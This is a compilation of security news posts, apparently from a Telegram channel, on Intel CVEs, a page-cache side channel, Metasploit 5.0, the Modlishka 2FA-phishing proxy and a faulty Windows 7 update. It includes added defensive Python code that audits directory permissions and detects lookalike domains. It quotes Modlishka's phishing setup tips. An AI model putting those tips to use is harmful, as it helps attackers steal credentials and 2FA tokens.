The second medium severity bug (CVE-2018-12166) affects Intel Optane SSD DC P4800X and may trigger denial-of-service.

"Insufficient write protection in firmware for Intel Optane SSD DC P4800X before version E2010435 may allow a privileged user to potentially enable a denial of service via local access," said the advisory.

As well as these flaws, Intel has released fixes for two more privilege escalation bugs with medium-severity ratings. These are CVE-2018-3703, affecting the Intel SSD Data Center Tool for Windows, and CVE-2017-3718, affecting the system firmware for Intel NUC.

"Improper directory permissions in the installer for the Intel SSD Data Center Tool for Windows before v3.0.17 may allow authenticated users to potentially enable an escalation of privilege via local access," said the advisory.
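Three of the advisories above name the same root cause: an installer or service directory whose permissions let an ordinary local user write into it, so that user can swap in a file that a privileged component later executes. The check a Windows administrator would want for that class is an audit of the install directory's DACL. Below is an added Python example, not Intel's tooling or advisory text: it parses the SDDL strings that `icacls <dir> /save <file>` writes (the two-line path/SDDL format and the three sample directories are constructed for this example) and flags any directory where a low-privileged principal holds a write-class right.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the two-line shape icacls /save writes (a path line,
# then the SDDL of that object's security descriptor). Three service install
# directories: one lets BUILTIN\Users modify it, one lets Everyone take full
# control, one is locked down correctly.
SAMPLE_ICACLS_SAVE = """\
WeakService
D:PAI(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;OICI;0x1301bf;;;BU)(A;OICI;0x1200a9;;;AU)
WorseService
D:PAI(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;OICI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-1-0)
GoodService
D:PAI(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)(A;OICI;0x1200a9;;;BU)(A;OICI;0x1200a9;;;AU)
"""

# SDDL two-letter rights aliases -> access-mask bits (file/directory meaning).
RIGHTS_ALIASES = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
    "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
}

# Bits that let the holder add or replace files, delete, or rewrite the ACL:
# FILE_WRITE_DATA/ADD_FILE, FILE_APPEND_DATA/ADD_SUBDIRECTORY, DELETE,
# WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_ALL.
WRITE_BITS = 0x2 | 0x4 | 0x10000 | 0x40000 | 0x80000 | 0x40000000 | 0x10000000

# Low-privileged principals, by SDDL alias and by raw well-known SID.
LOW_PRIV = {
    "BU": "BUILTIN\\Users", "S-1-5-32-545": "BUILTIN\\Users",
    "WD": "Everyone", "S-1-1-0": "Everyone",
    "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
    "IU": "INTERACTIVE", "S-1-5-4": "INTERACTIVE",
    "BG": "BUILTIN\\Guests", "S-1-5-32-546": "BUILTIN\\Guests",
}

# One ACE: (type;flags;rights;object_guid;inherit_guid;sid)
ACE_RE = re.compile(r"\((?P<type>[A-Z]+);(?P<flags>[A-Z]*);(?P<rights>[^;]*);"
                    r"(?P<obj>[^;]*);(?P<inh>[^;]*);(?P<sid>[^)]+)\)")


def rights_mask(rights: str) -> int:
    """Turn the SDDL rights field (hex mask or concatenated aliases) into an
    access mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        alias = rights[i:i + 2]
        if alias not in RIGHTS_ALIASES:
            raise ValueError(f"unknown SDDL rights alias {alias!r}")
        mask |= RIGHTS_ALIASES[alias]
    return mask


def parse_save_file(text: str) -> List[Tuple[str, str]]:
    """Pair each path line with the SDDL line that follows it."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("expected alternating path / SDDL lines")
    return [(lines[i], lines[i + 1]) for i in range(0, len(lines), 2)]


def weak_aces(sddl: str) -> List[Tuple[str, int]]:
    """Allow ACEs in the DACL that grant a low-privileged principal any
    write-class right. Deny ACEs are not netted out here; a full audit
    should compute effective access instead."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else ""
    dacl = dacl.split("S:", 1)[0]  # drop a trailing SACL if present
    findings = []
    for ace in ACE_RE.finditer(dacl):
        if ace["type"] != "A" or ace["sid"] not in LOW_PRIV:
            continue
        mask = rights_mask(ace["rights"])
        if mask & WRITE_BITS:
            findings.append((LOW_PRIV[ace["sid"]], mask))
    return findings


def find_weak_dirs(text: str) -> Dict[str, List[Tuple[str, int]]]:
    """Paths whose DACL lets an ordinary user modify the directory."""
    result = {}
    for path, sddl in parse_save_file(text):
        aces = weak_aces(sddl)
        if aces:
            result[path] = aces
    return result


if __name__ == "__main__":
    for path, aces in find_weak_dirs(SAMPLE_ICACLS_SAVE).items():
        for principal, mask in aces:
            print(f"{path}: {principal} holds write rights (mask 0x{mask:x})")
```

The sample's `0x1301bf` is the mask Windows shows as "Modify" and `0x1200a9` is "Read & execute"; only the former overlaps `WRITE_BITS`, so `GoodService` produces no finding. In practice the same check is worth running on every directory in a service's `ImagePath` and on the directories an installer extracts into.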

In November last year, security researchers discovered a side-channel vulnerability in Intel chips involving hyperthreading technology that would enable an attacker to break encryption. In October, researchers at Cisco Talos discovered flaws and vulnerabilities in the Intel Unified Shader compiler for the Intel Graphics Accelerator that could enable an attacker with normal user privileges in the guest to make a virtual machine unresponsive.

📡@cRyPtHoN_INFOSEC_EN


Side-Channel Attack Targets Windows, Linux

A research team of experts from Graz University of Technology, Boston University, NetApp, CrowdStrike, and Intel has published findings on page cache attacks. Unlike Spectre and Meltdown, this is a first-of-its-kind, hardware-agnostic side-channel attack that can remotely target operating systems such as Windows and Linux and effectively exfiltrate data, bypassing security precautions.

In explaining the attack, authors wrote: “Our side-channel permits unprivileged monitoring of some memory accesses of other processes, with a spatial resolution of 4KB and a temporal resolution of 2 microseconds on Linux (restricted to 6.7 measurements per second) and 466 nanoseconds on Windows (restricted to 223 measurements per second); this is roughly the same order of magnitude as the current state-of-the-art cache attacks.”

After detailing background information on hardware caches, cache attacks, and software caches, the authors provide an attack threat model in which the researchers “assume that attacker and victim have access to the same operating system page cache. On Linux, we also assume that the attacker has read access to the target page, which may be any page of any attacker-accessible file on the system.”

In addition to mitigation strategies, the researchers also stated that they responsibly disclosed the vulnerability to Microsoft, and the company said it will roll out a fix.

"This attack class presents a significantly lower complexity barrier than previous hardware-based, side-channel attacks and can easily be put into practice by threat actors, both nation-state as well as cyber-gangs,” said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks.

“In particular, password recovery via unprivileged applications is a major worry, as it would be available to most unwanted software bundlers and other programs typically thought of as relatively harmless. There is not much that an end user can currently do to protect themselves against this type of attack except to not run any software from a shady source, even if it does not raise any antivirus flag," said Hahad.

📡@cRyPtHoN_INFOSEC_EN


Rapid7 Releases Metasploit 5.0

Rapid7 on Friday announced the release of Metasploit 5.0. The latest major version of the popular penetration testing framework introduces several new important features, improved performance, and its developers say it should be easier to use.

According to Rapid7, Metasploit 5.0 brings significant changes in terms of database and automation APIs, improving the way the platform interacts with data and other tools. Metasploit has been using the PostgreSQL database system, but the latest version also allows users to run the database as a RESTful service, enabling interaction with Metasploit consoles and external tools.

There is also a new JSON-RPC API that should make it easier to integrate the framework with new tools and languages. In addition, Metasploit’s own automation protocol is now complemented by a common web service framework for the database and automation APIs.

Another significant improvement in Metasploit 5.0 is related to evasion modules and libraries. Penetration testers can now generate their own evasion modules more easily using the C programming language.

The latest version also enables the execution of an exploit module against multiple targets at a time.

Other improvements include faster and more advanced search functionality for modules, a new metashell feature, and support for three new languages – Go, Python and Ruby – for external modules.

Metasploit 5.0 is currently available from its official GitHub project. Rapid7 says it’s in the process of informing third-party developers that Metasploit 5.0 is stable – Linux distributions such as Kali and ParrotSec are shipped with Metasploit.

“Metasploit 5.0 offers a new data service, introduces fresh evasion capabilities, supports multiple languages, and builds upon the Framework’s ever-growing repository of world-class offensive security content,” wrote Brent Cook, engineering manager for Metasploit at Rapid7. “We’re able to continue innovating and expanding in no small part thanks to the many open source users and developers who make it a priority to share their knowledge with the community. You have our gratitude.”

📡@cRyPtHoN_INFOSEC_EN


Duszynski himself recommends utilising hardware-based 2FA tokens that use an authentication protocol such as U2F, as used by YubiKey, for example.

If that's not possible, then Annabel Jamieson, an associate manager at Accenture Security, recommends that in order to mitigate Modlishka organisations should:

1️⃣ Utilise deep packet inspection with SSL interception by a trusted proxy your organisation controls to help detect a Modlishka server reverse-proxying the connection.

2️⃣ Utilise DNS RPZs with a trusted authoritative DNS server to help to prevent the resolution of the fake Modlishka server domain in the first place.

3️⃣ Implement strict access controls on systems to mitigate the opportunity and capability of threat actors to successfully authenticate the systems despite having the correct credentials.

4️⃣ Raise awareness of new social engineering tricks used in phishing campaigns and provide users with threat intelligence that tracks these new techniques and tactics.
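Recommendation 2️⃣ above depends on knowing which domains to put in the RPZ, and the article's own description of the tool notes that a phishing domain is chosen to look as similar to the real one as possible. The added Python example below is not from the article, Accenture or the Modlishka project: it scans resolver query logs (constructed lines in the shape of BIND's querylog, for a constructed brand domain `acme-corp.com`) for lookalikes of a protected domain, using three heuristics that match how a reverse-proxy phishing host is typically named, and emits the RPZ records that would make those names resolve to NXDOMAIN.

```python
import re
from typing import Dict, Iterable, List, Optional

# Domains we protect (constructed sample brand; not from the article).
PROTECTED_DOMAINS = ["acme-corp.com"]

# Constructed resolver log lines in the shape of BIND's querylog. Only the
# "query: <name> IN <type>" part is used.
SAMPLE_QUERYLOG = """\
client @0x7f2c9c0f2a10 10.0.0.5#51234 (login.acme-corp.com): query: login.acme-corp.com IN A + (10.0.0.1)
client @0x7f2c9c0f2a10 10.0.0.7#40012 (acme-c0rp.com): query: acme-c0rp.com IN A + (10.0.0.1)
client @0x7f2c9c0f2a10 10.0.0.7#40013 (login.acme-corp.com.secure-session.net): query: login.acme-corp.com.secure-session.net IN A + (10.0.0.1)
client @0x7f2c9c0f2a10 10.0.0.9#33071 (acme-corp-login.com): query: acme-corp-login.com IN A + (10.0.0.1)
client @0x7f2c9c0f2a10 10.0.0.9#33072 (example.org): query: example.org IN AAAA + (10.0.0.1)
client @0x7f2c9c0f2a10 10.0.0.5#51240 (api.github.com): query: api.github.com IN A + (10.0.0.1)
"""

QUERY_RE = re.compile(r"query: (?P<qname>[A-Za-z0-9.-]+) IN (?P<qtype>[A-Z0-9]+)")


def registrable(qname: str) -> str:
    """Naive registrable domain: the last two labels. It does not know
    multi-label public suffixes such as co.uk; use a public-suffix list in
    production."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(qname: str, protected: Iterable[str]) -> Optional[str]:
    """Return a reason if qname looks like an impersonation of a protected
    domain, else None."""
    qname = qname.lower().rstrip(".")
    reg = registrable(qname)
    for brand in protected:
        brand = brand.lower()
        if reg == brand:
            return None  # the real domain or one of its own subdomains
        # Brand domain used as leading labels of a foreign registrable domain
        # (login.acme-corp.com.secure-session.net): the hostname in the
        # address bar starts exactly like the real one.
        if qname.startswith(brand + ".") or ("." + brand + ".") in qname:
            return f"protected domain {brand} embedded in hostname"
        brand_sld, reg_sld = brand.split(".")[0], reg.split(".")[0]
        dist = levenshtein(brand_sld, reg_sld)
        if 0 < dist <= 2:
            return f"typosquat of {brand} (edit distance {dist})"
        # Brand label padded with extra words (acme-corp-login). Very short
        # brand names will false-positive here; tune per organisation.
        if brand_sld in reg_sld:
            return f"contains brand label {brand_sld}"
    return None


def scan_querylog(log_text: str, protected: Iterable[str]) -> Dict[str, str]:
    """Map each suspicious registrable domain seen in the log to its reason."""
    protected = list(protected)
    suspects: Dict[str, str] = {}
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        reason = classify(m["qname"], protected)
        if reason:
            suspects.setdefault(registrable(m["qname"]), reason)
    return suspects


def rpz_records(suspects: Dict[str, str]) -> List[str]:
    """RPZ zone records: 'CNAME .' returns NXDOMAIN for the name, and the
    wildcard covers every label below it, so the proxy host and any
    subdomain it uses stop resolving for clients of this resolver."""
    records = []
    for domain in sorted(suspects):
        records.append(f"{domain} CNAME .")
        records.append(f"*.{domain} CNAME .")
    return records


if __name__ == "__main__":
    found = scan_querylog(SAMPLE_QUERYLOG, PROTECTED_DOMAINS)
    for domain, reason in sorted(found.items()):
        print(f"; {domain}: {reason}")
    print("\n".join(rpz_records(found)))
```

The emitted lines drop into an RPZ zone served by the trusted authoritative server the recommendation describes; the reason strings are kept so that an analyst can review each block before it is published, since the third heuristic in particular trades precision for recall.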

📡@cRyPtHoN_INFOSEC_EN


Creator of Modlishka 2FA-busting automated attack tool criticised for public release

A Polish security researcher has created an automated tool for cracking two-factor authentication systems in phishing attacks, a tool he has made publicly available.

Polish security researcher Piotr Duszynski has developed a new reverse proxy tool for penetration testers that can be used to carry out phishing exploits as part of a red team exercise.

So far so meh, but Duszynski has put his tool, called Modlishka, onto GitHub for anyone to download.

That sparks a little more interest. Throw in the fact that not only can Modlishka bypass many of the 2FA schemes in use today, but also automates the whole process, and we have to sit up and take note.

Modlishka, from the Polish 'modliszka' which means mantis, was written to make it as effective and simple as possible for penetration testers to breach the target internal network perimeter using the social engineering route.

In his 'how to use' Wiki Duszynski helpfully notes, "Before you start any email phishing campaign, you will need a credible domain name. Obviously, in order to minimise the risk of being easily spotted by the target user the chosen domain should be as similar to the original as possible."

There's also the small matter of getting the required wildcard SSL certificate before Modlishka can be used, but once again the instructions are there to use LetsEncrypt with acme.sh script to automate the process.

Automation is at the heart of Modlishka and it is this – along with the man-in-the-middle nature of the proxy, which enables the real-time collection of 2FA tokens – that makes Modlishka such a powerful hacking tool.

The author of Modlishka does issue a disclaimer on GitHub: "This tool is made only for educational purposes and can be only used in legitimate penetration tests. Author does not take any responsibility for any actions taken by its users."

However, releasing it into the public domain like this raises questions about the validity of that decision. Perhaps the most obvious is whether the benefit to penetration testers outweighs the risk of wannabe black hats having access to such a powerful point-and-click hacking tool. Duszynski says that "without a working proof of concept... the risk is treated as theoretical" and therefore "no real measures are taken to address it properly."

SC Media UK has been asking the industry for its opinion.

"Releasing a tool allows organisations to test their defences and also build new defences for that specific tool," Cesar Cerrudo, CTO at ethical hacking outfit IOActive, told SC. "There are benefits for organisations that are proactive on security to use these kinds of tools. By doing so they can better understand what they are defending against in order to create new IDS rules, train the users, and ultimately strengthen their overall security posture."

Matthew Hall, penetration test team leader at Sec-1, part of the Claranet Cyber Security Unit, was quick to point out that exploit kits like Modlishka are nothing new. "This form of phishing and man-in-the-middle platform has previously been implemented by the evilginx project over two years ago," Hall told SC. "Publishing any exploitation toolkit demonstrates how simple it is for a malicious person to attack systems and users, and thus encourages businesses and users to improve defences and recovery capabilities against layered attacks."

While these kinds of tools have, indeed, been available to security firms and black hats alike for the longest time, they don't tend to find their way into the public domain for fear of exposing the exploit techniques in use and therefore enabling them to be neutralised. A point made by Thomas Richards, associate principal consultant at Synopsys, who told SC, "Releasing this tool to the public allows for enterprises to understand how the tool works and create detection or prevention techniques to stop the tool."

So, what should enterprises be doing to ensure that their networks are not susceptible to exploit kits such as Modlishka?


Microsoft updates brick Windows 7 devices

Microsoft Corp. this Tuesday released two software updates that reportedly rendered some Windows 7-based machines useless by mistake.

The problem springs from the implementation of Microsoft’s 8 January, 2019, security-only update KB4480960 or Monthly Rollup update KB4480970, in combination with older update KB971033, whose previous iteration dates back to April 2018.

The two more recent updates introduced new protections against the Spectre and Meltdown side-channel vulnerabilities, fixed a session isolation bug affecting PowerShell remote endpoints, and patched various other Windows offerings. The other, KB971033, updated the activation and validation components found in Windows Activation Technologies, which help users confirm they are running a genuine version of Windows 7 on their computers.

A 9 January post and subsequent thread on Reddit’s sysadmin forum addressed the error. "Woke up this morning to find a few thousand Windows 7 VDI machines reporting that Windows 7 wasn’t genuine," the sysadmin’s original post said. "After much troubleshooting we found that KB971033 (should not have been installed in a KMS environment in the first place) was installed on these machines. Until today having this KB installed hasn’t been an issue, it appears a change to how Microsoft’s activation servers respond to a standard KMS key being sent to them may be to blame."

KMS stands for Microsoft’s Key Management Service, which allows users to automatically activate volume license editions of Windows and Office.

Both Microsoft 8 January updates also reference the unexpected glitch in a subsection titled "Known issues in this update."

"After installing this update, some users are reporting the KMS Activation error, ‘Not Genuine’, 0xc004f200 on Windows 7 devices," the company advisory said. "We are aware of this incident and are presently investigating it. We will provide an update when available."

In the Reddit post, the sysadmin said that one way users can resolve the issue is by "removing the update, deleting the KMS cache and activation data from the PCs and re-activating against KMS."

This article was originally published on SC Media US.

📡@cRyPtHoN_INFOSEC_EN
